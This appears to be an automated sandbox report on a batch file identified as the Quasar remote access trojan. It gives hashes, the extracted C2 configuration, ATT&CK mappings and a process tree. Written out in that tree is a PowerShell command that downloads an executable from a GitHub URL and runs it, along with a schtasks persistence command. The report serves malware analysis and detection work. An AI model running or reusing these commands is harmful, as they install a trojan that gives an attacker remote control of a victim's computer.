Overview

overview

10

Static

static

1

Test.bat

windows7-x64

8

Test.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    138s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 12:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Test.bat

  • Size

    186B

  • MD5

    9c4d95c3db51f66fed113f3f97c634ed

  • SHA1

    4aa3b2737d2883c3546ba198dbfe01354ed280b3

  • SHA256

    624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a

  • SHA512

    ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b

Score
10/10
quasarastro-1executionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Astro-1

C2

arthurus36.duckdns.org:5555

Mutex

ad7cd985-5e2e-45a3-9246-b82449c7c4d8

Attributes
  • encryption_key

    6314C8C60AA1035CEB920FD38F0342E398BAF5D0

  • install_name

    cmdprmpt.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    systemdex

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Test.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command cd C:\Windows mkdir .temp2 Invoke-WebRequest https://github.com/1048discord/RATCLIENT/raw/main/Beta.exe -OutFile Client.exe start Client.exe
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3528
      • C:\Windows\Client.exe
        "C:\Windows\Client.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "systemdex" /sc ONLOGON /tr "C:\Windows\system32\cmdprmpt.exe" /rl HIGHEST /f
          4⤵
          • Creates scheduled task(s)
          PID:4448
        • C:\Windows\system32\cmdprmpt.exe
          "C:\Windows\system32\cmdprmpt.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3780
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "systemdex" /sc ONLOGON /tr "C:\Windows\system32\cmdprmpt.exe" /rl HIGHEST /f
            5⤵
            • Creates scheduled task(s)
            PID:1332
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5072 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1556

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Persistence

    Scheduled Task/Job

    1
    T1053

    Privilege Escalation

    Scheduled Task/Job

    1
    T1053

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vahkfwcu.123.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Windows\Client.exe
      Filesize

      3.1MB

      MD5

      bb26a2979d9a61725f910422403ed4dd

      SHA1

      b46d4a3a7f7253e1d7268c060702d301ebb36dd6

      SHA256

      fb80d28a129184b6a273bd893aeee80765b6ec3eb617d90c6d32d0738bcbbfef

      SHA512

      dfa1d068282cae728f6adf890065c0dcecbf9215646f50313d995afd209f52c07f3fd8e1e414c8712af1e2b5306ef453a9b6419f1c574dbd445acbc276426200

      Download Submit
    • memory/2716-39-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2716-32-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2716-31-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2716-29-0x0000000000620000-0x0000000000944000-memory.dmp
      Filesize

      3.1MB

      Download
    • memory/3528-12-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3528-27-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3528-30-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3528-13-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3528-28-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3528-0-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3528-11-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3528-10-0x00000261518B0000-0x00000261518D2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3780-40-0x0000000003110000-0x0000000003160000-memory.dmp
      Filesize

      320KB

      Download
    • memory/3780-41-0x000000001C250000-0x000000001C302000-memory.dmp
      Filesize

      712KB

      Download